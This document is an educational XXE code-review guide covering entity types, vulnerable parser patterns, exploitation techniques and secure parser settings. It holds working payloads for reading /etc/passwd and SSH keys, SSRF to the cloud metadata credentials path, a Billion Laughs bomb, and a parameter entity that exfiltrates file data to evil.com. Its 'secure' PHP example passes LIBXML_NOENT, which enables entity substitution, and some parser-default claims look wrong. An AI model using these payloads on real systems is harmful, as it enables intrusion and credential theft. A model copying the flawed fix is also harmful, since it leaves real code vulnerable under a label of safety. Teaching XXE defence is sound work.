XML External Entities (XXE) Code Review Guide
Table of Contents
Introduction
XML External Entity (XXE) injection is a vulnerability that targets applications parsing XML input. When XML parsers are configured to process external entity references, attackers can read local files, perform server-side request forgery (SSRF), or cause denial of service.
XXE was ranked #4 in the OWASP Top 10 2017 before being merged into the broader "Security Misconfiguration" category. Despite reduced prevalence due to safer defaults in modern parsers, XXE remains a critical vulnerability in enterprise applications, document processing systems, and APIs accepting XML input.
Where XXE Still Lurks
XXE commonly appears in: SOAP web services, SAML authentication, Office document processing (DOCX, XLSX are ZIP files with XML), SVG image handling, RSS/Atom feed parsing, and any legacy system accepting XML. Many developers assume JSON-only APIs are safe, but XML parsers may still be present.
What enables XXE attacks in XML parsers?
Understanding XML Entities
XML entities are placeholders that get replaced with their defined values during parsing. They come in several types, and understanding them is essential for identifying XXE vulnerabilities.
XML Entity Types
1<!-- INTERNAL ENTITY: Defined and used within the document -->
2<!DOCTYPE doc [
3 <!ENTITY company "Acme Corporation">
4]>
5<doc>Welcome to &company;</doc>
6<!-- Result: Welcome to Acme Corporation -->
7
8
9<!-- EXTERNAL ENTITY: References external resource (XXE vector!) -->
10<!DOCTYPE doc [
11 <!ENTITY xxe SYSTEM "file:///etc/passwd">
12]>
13<doc>&xxe;</doc>
14<!-- Result: Contents of /etc/passwd! -->
15
16
17<!-- PARAMETER ENTITY: Used within DTD definitions (%) -->
18<!DOCTYPE doc [
19 <!ENTITY % file SYSTEM "file:///etc/passwd">
20 <!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://evil.com/?data=%file;'>">
21 %eval;
22]>
23<!-- Used in blind XXE attacks -->
24
25
26<!-- PREDEFINED ENTITIES: Built-in, safe -->
27< <!-- < -->
28> <!-- > -->
29& <!-- & -->
30" <!-- " -->
31' <!-- ' -->DTD (Document Type Definition) Basics
1<!-- DTD can be internal (inline) or external -->
2
3<!-- Internal DTD -->
4<?xml version="1.0"?>
5<!DOCTYPE root [
6 <!ELEMENT root (child)>
7 <!ELEMENT child (#PCDATA)>
8 <!ENTITY name "value">
9]>
10<root><child>&name;</child></root>
11
12
13<!-- External DTD (referenced by URL) -->
14<?xml version="1.0"?>
15<!DOCTYPE root SYSTEM "http://example.com/schema.dtd">
16<root>...</root>
17
18
19<!-- External DTD (PUBLIC identifier) -->
20<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0//EN"
21 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
22
23
24<!-- The SYSTEM keyword fetches from URL or file path -->
25<!-- This is what makes XXE possible! -->What does the SYSTEM keyword do in an entity declaration?
XXE Attack Types
XXE can be exploited in several ways depending on how the application handles XML and returns responses. Understanding each attack type helps assess vulnerability impact.
XXE Attack Types
Read local files like /etc/passwd, config files, source code using file:// protocol
Make server-side requests to internal services using http:// protocol
Exfiltrate data via DNS or HTTP when no direct response is visible
Exponential entity expansion causing memory exhaustion and denial of service
Classic XXE - File Disclosure
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE foo [
3 <!ENTITY xxe SYSTEM "file:///etc/passwd">
4]>
5<userInfo>
6 <username>&xxe;</username>
7</userInfo>
8
9<!-- Server response might include: -->
10<response>
11 <message>Welcome, root:x:0:0:root:/root:/bin/bash
12daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
13...</message>
14</response>
15
16<!-- Common file targets: -->
17<!-- Linux: /etc/passwd, /etc/shadow, ~/.ssh/id_rsa, /proc/self/environ -->
18<!-- Windows: C:Windowswin.ini, C:WindowsSystem32driversetchosts -->
19<!-- App: ../../../config.php, /var/www/html/.env, WEB-INF/web.xml -->Billion Laughs Attack (DoS)
1<?xml version="1.0"?>
2<!DOCTYPE lolz [
3 <!ENTITY lol "lol">
4 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
5 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
6 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
7 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
8 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
9 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
10 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
11 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
12]>
13<lolz>&lol9;</lolz>
14
15<!-- This small XML expands to ~3GB of "lol" strings -->
16<!-- Each level multiplies by 10: 10^9 = 1 billion "lol"s -->
17<!-- Causes memory exhaustion and denial of service -->
18
19<!-- Also called "XML Bomb" or "Exponential Entity Expansion" -->XXE Attack Flow
Contains external entity definition pointing to sensitive fileParser resolves external entity, fetches file content&xxe; → contents of /etc/passwdResponse contains file contents or error reveals dataImpact: XXE can read local files, perform SSRF to internal systems, cause denial of service, and in some cases achieve remote code execution.
Why is the 'Billion Laughs' attack effective with a small payload?
Finding Vulnerable Parsers
Different XML parsing libraries have different default configurations. Some are safe by default, while others enable dangerous features. During code review, identify which parser is used and verify its configuration.
XML Parser Default Security
| Language | Parser | Default DTD | Default External Entities |
|---|---|---|---|
| Java | DocumentBuilderFactory | Enabled ⚠️ | Enabled ⚠️ |
| Java | SAXParserFactory | Enabled ⚠️ | Enabled ⚠️ |
| Java | XMLInputFactory (StAX) | Enabled ⚠️ | Enabled ⚠️ |
| Python | xml.etree.ElementTree | Disabled ✓ | Disabled ✓ |
| Python | lxml | Disabled ✓ | Disabled ✓ |
| Python | xml.sax | Enabled ⚠️ | Enabled ⚠️ |
| PHP | simplexml_load_string | Enabled ⚠️ | Enabled ⚠️ |
| PHP | DOMDocument | Enabled ⚠️ | Enabled ⚠️ |
| .NET | XmlDocument | Varies by version | Varies ⚠️ |
| .NET | XmlReader | Disabled ✓ (.NET 4.5.2+) | Disabled ✓ |
| Node.js | libxmljs | Disabled ✓ | Disabled ✓ |
| Ruby | Nokogiri | Disabled ✓ | Disabled ✓ |
Vulnerable Parser Patterns
1// VULNERABLE: Java DocumentBuilderFactory (default settings)
2DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
3DocumentBuilder db = dbf.newDocumentBuilder();
4Document doc = db.parse(xmlInput); // XXE possible!
5
6// VULNERABLE: Java SAXParser (default settings)
7SAXParserFactory spf = SAXParserFactory.newInstance();
8SAXParser parser = spf.newSAXParser();
9parser.parse(xmlInput, handler); // XXE possible!
10
11// VULNERABLE: Java XMLInputFactory (StAX)
12XMLInputFactory xif = XMLInputFactory.newInstance();
13XMLStreamReader reader = xif.createXMLStreamReader(input); // XXE possible!
14
15// VULNERABLE: Java Unmarshaller (JAXB)
16JAXBContext context = JAXBContext.newInstance(MyClass.class);
17Unmarshaller unmarshaller = context.createUnmarshaller();
18MyClass obj = (MyClass) unmarshaller.unmarshal(xmlSource); // XXE possible!More Vulnerable Patterns
1# VULNERABLE: PHP
2$doc = simplexml_load_string($xml); // XXE by default
3$dom = new DOMDocument();
4$dom->loadXML($xml); // XXE by default
5
6# VULNERABLE: Python xml.sax
7parser = xml.sax.make_parser()
8parser.parse(xml_input) # External entities enabled!
9
10# VULNERABLE: .NET (older versions)
11XmlDocument doc = new XmlDocument();
12doc.LoadXml(xmlString); // XXE in .NET < 4.5.2
13
14# VULNERABLE: Ruby REXML (older versions)
15doc = REXML::Document.new(xml_string) # Check version!
16
17# Code review grep patterns:
18grep -rn "DocumentBuilderFactory" --include="*.java"
19grep -rn "SAXParserFactory" --include="*.java"
20grep -rn "XMLInputFactory" --include="*.java"
21grep -rn "simplexml_load" --include="*.php"
22grep -rn "DOMDocument" --include="*.php"
23grep -rn "xml.sax" --include="*.py"
24grep -rn "XmlDocument" --include="*.cs"When reviewing Java code, which class should trigger immediate XXE concern?
Exploitation Techniques
XXE exploitation varies based on what protocols the parser supports and whether the application returns XML content in responses. Here are common exploitation techniques.
Basic File Read
1<!-- Reading /etc/passwd on Linux -->
2<?xml version="1.0"?>
3<!DOCTYPE foo [
4 <!ENTITY xxe SYSTEM "file:///etc/passwd">
5]>
6<data>&xxe;</data>
7
8<!-- Reading files on Windows -->
9<?xml version="1.0"?>
10<!DOCTYPE foo [
11 <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
12]>
13<data>&xxe;</data>
14
15<!-- Reading application config -->
16<?xml version="1.0"?>
17<!DOCTYPE foo [
18 <!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
19]>
20<data>&xxe;</data>
21
22<!-- PHP source may break XML due to < > characters -->
23<!-- Use PHP wrapper to base64 encode: -->
24<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">Handling Special Characters
1<!-- Problem: Files with < > & break XML parsing -->
2<!-- Solution 1: Use CDATA wrapper (if parser supports) -->
3<!DOCTYPE foo [
4 <!ENTITY xxe SYSTEM "file:///etc/passwd">
5]>
6<data><![CDATA[&xxe;]]></data>
7
8<!-- Solution 2: PHP base64 filter -->
9<!DOCTYPE foo [
10 <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
11]>
12<data>&xxe;</data>
13<!-- Returns: cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo= -->
14
15<!-- Solution 3: Parameter entities with CDATA -->
16<!DOCTYPE foo [
17 <!ENTITY % file SYSTEM "file:///etc/passwd">
18 <!ENTITY % start "<![CDATA[">
19 <!ENTITY % end "]]>">
20 <!ENTITY % wrapper "<!ENTITY xxe '%start;%file;%end;'>">
21 %wrapper;
22]>
23<data>&xxe;</data>Directory Listing
1<!-- Some parsers support directory listing with file:// -->
2<?xml version="1.0"?>
3<!DOCTYPE foo [
4 <!ENTITY xxe SYSTEM "file:///var/www/">
5]>
6<data>&xxe;</data>
7
8<!-- Java file protocol often supports directory listing -->
9<!-- Returns list of files in directory -->
10
11<!-- Alternative: Use jar:// protocol in Java -->
12<!DOCTYPE foo [
13 <!ENTITY xxe SYSTEM "jar:file:///var/www/app.war!/WEB-INF/web.xml">
14]>
15<data>&xxe;</data>Why might reading a PHP file via XXE fail or break the response?
SSRF via XXE
XXE can be used to perform Server-Side Request Forgery (SSRF) by making the server fetch content from internal or external URLs. This can probe internal services, access cloud metadata, or exploit internal APIs.
SSRF via XXE Payloads
1<!-- Probe internal network -->
2<?xml version="1.0"?>
3<!DOCTYPE foo [
4 <!ENTITY xxe SYSTEM "http://192.168.1.1/">
5]>
6<data>&xxe;</data>
7
8<!-- Access cloud metadata (AWS) -->
9<?xml version="1.0"?>
10<!DOCTYPE foo [
11 <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
12]>
13<data>&xxe;</data>
14
15<!-- Internal service scanning -->
16<?xml version="1.0"?>
17<!DOCTYPE foo [
18 <!ENTITY xxe SYSTEM "http://localhost:8080/admin">
19]>
20<data>&xxe;</data>
21
22<!-- Port scanning via error messages -->
23<!-- Open port: Returns content or empty response -->
24<!-- Closed port: Connection refused error -->
25<!DOCTYPE foo [
26 <!ENTITY xxe SYSTEM "http://internal-server:22/">
27]>Protocol Handlers
1# Different parsers support different protocols:
2
3file:// - Local file access (most parsers)
4http:// - HTTP requests (most parsers)
5https:// - HTTPS requests (most parsers)
6ftp:// - FTP requests (some parsers)
7jar:// - Java archive access (Java parsers)
8netdoc:// - Java network document (older Java)
9gopher:// - Gopher protocol (some parsers, powerful SSRF)
10dict:// - Dictionary protocol
11php:// - PHP wrappers (PHP only)
12data:// - Data URLs (some parsers)
13expect:// - Command execution (PHP with expect, rare)
14
15# Java-specific protocols:
16jar:file:///path/to/file.jar!/internal/file.xml
17netdoc:///etc/passwd (deprecated but may work)
18
19# Useful for SSRF:
20http://169.254.169.254/ - Cloud metadata
21http://localhost:port/ - Local services
22http://internal-host/ - Internal networkXXE to Full Cloud Compromise
On cloud platforms (AWS, GCP, Azure), XXE SSRF to metadata endpoints (169.254.169.254) can retrieve IAM credentials, leading to full cloud account compromise. This is one of the most severe XXE exploitation paths.
Why is accessing http://169.254.169.254 via XXE particularly dangerous on AWS?
Prevention Techniques
The most effective XXE prevention is to disable DTD processing and external entities in the XML parser. Each language and parser has specific configuration options.
Secure Configuration - Java
1// SECURE: DocumentBuilderFactory
2DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
3
4// Disable DTDs entirely
5dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
6
7// Or disable external entities specifically
8dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
9dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
10dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
11dbf.setXIncludeAware(false);
12dbf.setExpandEntityReferences(false);
13
14DocumentBuilder db = dbf.newDocumentBuilder();
15Document doc = db.parse(xmlInput); // Now safe!
16
17
18// SECURE: SAXParserFactory
19SAXParserFactory spf = SAXParserFactory.newInstance();
20spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
21spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
22spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
23
24
25// SECURE: XMLInputFactory (StAX)
26XMLInputFactory xif = XMLInputFactory.newInstance();
27xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
28xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);Secure Configuration - Other Languages
1# SECURE: PHP
2// Disable external entities before loading
3libxml_disable_entity_loader(true); // PHP < 8.0
4$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT | LIBXML_DTDLOAD);
5
6// Better: Use LIBXML_NONET to prevent network access
7$dom = new DOMDocument();
8$dom->loadXML($xml, LIBXML_NOENT | LIBXML_NONET);
9
10
11# SECURE: Python
12# xml.etree.ElementTree is safe by default
13import xml.etree.ElementTree as ET
14tree = ET.parse(xml_file) # Safe
15
16# defusedxml library for maximum safety
17import defusedxml.ElementTree as ET
18tree = ET.parse(xml_file) # Explicitly safe
19
20
21# SECURE: .NET (C#)
22XmlReaderSettings settings = new XmlReaderSettings();
23settings.DtdProcessing = DtdProcessing.Prohibit; // Safest
24settings.XmlResolver = null; // Disable external resolution
25
26using (XmlReader reader = XmlReader.Create(stream, settings))
27{
28 // Safe parsing
29}
30
31
32# SECURE: Ruby Nokogiri
33doc = Nokogiri::XML(xml_string) do |config|
34 config.strict.nonet # Disable network access
35endXXE Prevention Checklist
| Control | Implementation | Priority |
|---|---|---|
| Disable DTDs | disallow-doctype-decl = true | Critical |
| Disable external entities | external-general-entities = false | Critical |
| Disable parameter entities | external-parameter-entities = false | Critical |
| Disable external DTD loading | load-external-dtd = false | High |
| Disable XInclude | setXIncludeAware(false) | High |
| Use safe libraries | defusedxml (Python), Nokogiri (Ruby) | High |
| Input validation | Reject XML with DOCTYPE | Medium |
| WAF rules | Block DOCTYPE in XML requests | Medium |
What is the most comprehensive way to prevent XXE in Java?